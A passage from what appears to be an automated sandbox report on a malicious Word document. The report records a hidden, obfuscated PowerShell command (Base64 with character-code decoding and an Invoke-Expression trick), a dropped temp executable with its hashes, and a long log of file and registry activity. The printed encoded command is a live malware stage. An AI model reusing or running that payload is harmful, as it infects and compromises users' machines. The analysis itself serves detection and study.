AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU, os_pid = 0xa68, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:02 |
| Information | Value |
|---|---|
| PID | 0xa68 |
| Parent PID | 0x9c4 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A6C
0x
A80
0x
A84
0x
A88
0x
A8C
0x
A90
0x
A94
0x
A9C
0x
AA4
0x
AA8
0x
AAC
0x
AB0
0x
ACC
0x
AD8
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe | 100.00 KB (102400 bytes) |
MD5:
d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
13 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
